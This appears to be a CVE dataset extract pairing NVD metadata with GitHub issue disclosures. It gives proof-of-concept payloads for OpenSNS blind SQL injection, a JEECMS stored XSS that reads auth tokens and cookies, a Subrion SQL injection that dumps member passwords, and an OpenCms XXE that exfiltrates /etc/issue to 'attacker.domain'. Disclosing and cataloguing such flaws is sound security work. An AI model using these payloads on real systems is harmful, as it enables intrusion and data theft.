[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensns:opensns:6.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "55B39DFB-7FD4-4F5E-8418-82ADBC56D757", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CoColizdf/CVE/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CoColizdf", "CVE" ]
OpenSNS v6.1.0 have unauthorized sleep blind injection SQL vulnerability pid parameter # A unauthorized sleep blind injection SQL vulnerability was discovered in OpenSNS CMS v6.1.0 about pid parameter this CMS offical website > http://www.opensns.cn/ if you want to download source code ,offical website need china phone number,so i downlaod it ,put it `https://github.com/CoColizdf/CVE/blob/master/opensns6.10.zip` ![image](https://user-images.githubusercontent.com/36567737/71607874-17b5f900-2bb8-11ea-9066-838adc238198.png) vul url > http://192.168.95.131/uploads_download_2019-07-16_5d2d5d4697d88/index.php?s=/home/addons/_addons/china_city/_controller/china_city/_action/getcity.html poc ``` POST /index.php?s=%2Fhome%2Faddons%2F_addons%2Fchina_city%2F_controller%2Fchina_city%2F_action%2Fgetcity.html HTTP/1.1 Host: 192.168.95.131 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Content-Length: 116 Accept: */* Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,und;q=0.7 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.95.131 Referer: http://192.168.95.131/uploads_download_2019-07-16_5d2d5d4697d88/index.php?s=/ucenter/config/index.html X-Requested-With: XMLHttpRequest Accept-Encoding: gzip cid=0&pid%5B0%5D=%3D%28select%2Afrom%28select%2Bsleep%283%29union%2F%2A%2A%2Fselect%2B1%29a%29and+3+in+&pid%5B1%5D=3 ``` ![image](https://user-images.githubusercontent.com/36567737/71607886-28ff0580-2bb8-11ea-9983-fa3c25d84dfe.png) ![image](https://user-images.githubusercontent.com/36567737/71607892-2dc3b980-2bb8-11ea-8ccb-8ef9e132032f.png) ![image](https://user-images.githubusercontent.com/36567737/72269077-f0523800-365d-11ea-8dd9-24eb4ad12c7e.png) Vulnerability file Addons/ChinaCity/Controller/ChinaCityController.class.php:50 ![image](https://user-images.githubusercontent.com/36567737/71607897-361bf480-2bb8-11ea-98b7-edaa3c1ba9ea.png) ![image](https://user-images.githubusercontent.com/36567737/71607900-39af7b80-2bb8-11ea-812a-33259ce22b9a.png) ![image](https://user-images.githubusercontent.com/36567737/71607905-3d430280-2bb8-11ea-9574-48f8d76a913b.png) from CoColi (Chaitin Tech)
OpenSNS v6.1.0 have unauthorized sleep blind injection SQL vulnerability pid parameter
https://api.github.com/repos/CoCoCoCoCoColi/CVE/issues/1/comments
0
2019-12-31T02:30:25Z
2020-01-13T15:39:46Z
https://github.com/CoCoCoCoCoColi/CVE/issues/1
544,068,718
1
2,672
CVE-2020-21726
2021-10-07T22:15:07.400
OpenSNS v6.1.0 contains a blind SQL injection vulnerability in /Controller/ChinaCityController.class.php via the cid parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CoColizdf/CVE/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CoColizdf/CVE/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensns:opensns:6.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "55B39DFB-7FD4-4F5E-8418-82ADBC56D757", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CoColizdf/CVE/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CoColizdf", "CVE" ]
OpenSNS v6.1.0 have unauthorized sleep blind injection SQL vulnerability cid parameter # A unauthorized sleep blind injection SQL vulnerability was discovered in OpenSNS CMS v6.1.0 about cid parameter this CMS offical website > http://www.opensns.cn/ ![image](https://user-images.githubusercontent.com/36567737/71608001-d245fb80-2bb8-11ea-96d3-4eae12caf2d5.png) vuln url > index.php?s=%2Fhome%2Faddons%2F_addons%2Fchina_city%2F_controller%2Fchina_city%2F_action%2Fgetdistrict.html poc ``` POST /index.php?s=%2Fhome%2Faddons%2F_addons%2Fchina_city%2F_controller%2Fchina_city%2F_action%2Fgetdistrict.html HTTP/1.1 Host: 192.168.95.131 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Content-Length: 121 Accept: */* Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,und;q=0.7 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Origin: http://192.168.95.131 Pragma: no-cache Referer: http://192.168.95.131/uploads_download_2019-07-16_5d2d5d4697d88/index.php?s=/ucenter/config/index.html X-Requested-With: XMLHttpRequest Accept-Encoding: gzip cid%5B0%5D=%3D%28select%2Afrom%28select%2Bsleep%283%29union%2F%2A%2A%2Fselect%2B1%29a%29and+3+in+&cid%5B1%5D=3&did=110102 ``` ![image](https://user-images.githubusercontent.com/36567737/71608012-dc67fa00-2bb8-11ea-9f64-6366f9aa60f6.png) ![image](https://user-images.githubusercontent.com/36567737/71608013-dffb8100-2bb8-11ea-9864-892e496ccac6.png) vuln file > Addons/ChinaCity/Controller/ChinaCityController.class.php:77 ![image](https://user-images.githubusercontent.com/36567737/71608019-e853bc00-2bb8-11ea-86b4-48b66547923b.png) ThinkPHP/Library/Think/Db.class.php:772 ![image](https://user-images.githubusercontent.com/36567737/71608024-f1448d80-2bb8-11ea-82d2-09e396dc5eb8.png) ![image](https://user-images.githubusercontent.com/36567737/71608027-f570ab00-2bb8-11ea-889f-ee56c9fc64c9.png) from CoColi (Chaitin Tech)
A unauthorized sleep blind injection SQL vulnerability was discovered in OpenSNS CMS v6.1.0 about cid parameter
https://api.github.com/repos/CoCoCoCoCoColi/CVE/issues/2/comments
0
2019-12-31T02:34:51Z
2019-12-31T02:34:51Z
https://github.com/CoCoCoCoCoColi/CVE/issues/2
544,069,433
2
2,673
CVE-2020-21729
2021-10-07T22:15:07.440
JEECMS x1.1 contains a stored cross-site scripting (XSS) vulnerability in the component of /member-vipcenter.htm, which allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CoColizdf/CVE/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CoColizdf/CVE/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecms:jeecms_x:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "DC763108-C91F-4A88-9F98-99D2AF13AACA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/CoColizdf/CVE/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CoColizdf", "CVE" ]
this is cms offical website > http://www.jeecms.com/ A stored xss vulnerability was discovered in JEECMS x1.1 ![2333](https://user-images.githubusercontent.com/36567737/71718626-c5dece80-2e56-11ea-8614-f039203f77e5.gif) ## poc vuln url: http://192.168.95.133:8080/member-vipcenter.htm payload is `title <svg/onload=alert(1)> ` ![image](https://user-images.githubusercontent.com/36567737/71718558-8912d780-2e56-11ea-9db9-4f60e13f6c58.png) after submit ,refresh this page Trigger XSS Vulnerability ![image](https://user-images.githubusercontent.com/36567737/71718563-8d3ef500-2e56-11ea-9110-fd209e869dc0.png) ``` <svg/onload=alert(localStorage.getItem('JEECMS-Auth-Token')+"\n\nCookie:"+document.cookie)> ``` ![image](https://user-images.githubusercontent.com/36567737/71718571-95973000-2e56-11ea-8bd6-16316474af76.png) ![image](https://user-images.githubusercontent.com/36567737/71718577-9a5be400-2e56-11ea-956d-481ac320c43f.png) ## Vulnerability file WEB-INF/lib/jeecms-component-x1.1.0.jar!/com/jeecms/content/service/impl/ContentFrontServiceImpl.class:335 ``` content = dto.initContent(content, dto, channel, site.getCmsSiteCfg(), site.getId(), channel.getRealWorkflowId() != null, false); ``` WEB-INF/lib/jeecms-component-x1.1.0.jar!/com/jeecms/content/domain/dto/ContentContributeDto.class:115 ![image](https://user-images.githubusercontent.com/36567737/71718588-a2b41f00-2e56-11ea-9f19-6ffca157b202.png) WEB-INF/lib/jeecms-component-x1.1.0.jar!/com/jeecms/content/domain/Content.class:814 ![image](https://user-images.githubusercontent.com/36567737/71718596-a778d300-2e56-11ea-8070-1245c278b6da.png) from CoColi(Chaitin Tech)
JEECMS x1.1 have Stored XSS vulnerability
https://api.github.com/repos/CoCoCoCoCoColi/CVE/issues/3/comments
1
2020-01-03T10:30:26Z
2021-10-09T07:55:21Z
https://github.com/CoCoCoCoCoColi/CVE/issues/3
544,936,793
3
2,674
CVE-2021-41947
2021-10-08T13:15:07.727
A SQL injection vulnerability exists in Subrion CMS v4.2.1 in the visual-mode.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/887" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-41947" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/887" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-41947" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:intelliants:subrion_cms:4.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "1964CC54-4FD5-44DF-A183-0538C48EA988", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/intelliants/subrion/issues/887
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "intelliants", "subrion" ]
Login as admin Go to `http://localhost/panel/visual-mode.json?get=access&type=blocks' UNION ALL SELECT username, password FROM sbr421_members -- -&object=landing_what_is_this&page=index` ![firefox_vG4H5SPJ7q](https://user-images.githubusercontent.com/91490386/135034050-064e12d6-5287-4ae6-952e-6ebc187134e0.png)
SQL injection in visual mode
https://api.github.com/repos/intelliants/subrion/issues/887/comments
0
2021-09-28T06:23:17Z
2021-09-28T06:23:41Z
https://github.com/intelliants/subrion/issues/887
1,009,336,194
887
2,675
CVE-2021-3312
2021-10-08T15:15:09.217
An XML external entity (XXE) vulnerability in Alkacon OpenCms 11.0, 11.0.1 and 11.0.2 allows remote authenticated users with edit privileges to exfiltrate files from the server's file system by uploading a crafted SVG document.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alkacon/opencms-core/issues/725" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/alkacon/opencms-core/releases" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alkacon/opencms-core/issues/725" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/alkacon/opencms-core/releases" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alkacon:opencms:11.0:-:*:*:*:*:*:*", "matchCriteriaId": "745FD94C-C000-4E6B-B294-2805AC3616F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:alkacon:opencms:11.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "7B548587-654B-48A2-8C92-E5E4DF62CCCA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:alkacon:opencms:11.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "2A1AFD5A-1149-42D1-BD87-8BDA306633B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/alkacon/opencms-core/issues/725
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "alkacon", "opencms-core" ]
In OpenCms 11.x, it is possible for logged in users with edit permissions to exfiltrate data from the server's file system and send it to an external server by uploading specially crafted SVGs files. Example in which the first line of /etc/issue is read and sent to the server "attacker.domain": The SVG file to upload: ``` <!DOCTYPE svg [ <!ELEMENT svg ANY > <!ENTITY % sp SYSTEM "http://attacker.domain/evil.xml"> %sp; ]> <svg viewBox="0 0 200 200" version="1.2" xlmns="http://www.w3.org/2000/svg" style="fill:red"> <text x="15" y="100" style="fill:black">&exfil;</text> </svg> ``` The evil.xml file served by the external server "attacker.domain": ``` <!ENTITY % file SYSTEM "file:///etc/issue"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.domain/?%file;'>"> %eval; %exfil; ``` CVE ID: CVE-2021-3312.
XXE vulnerability allows exfiltration of data from the server file system by uploading a crafted SVG
https://api.github.com/repos/alkacon/opencms-core/issues/725/comments
1
2021-10-07T08:28:02Z
2021-10-07T08:29:55Z
https://github.com/alkacon/opencms-core/issues/725
1,019,763,377
725
2,676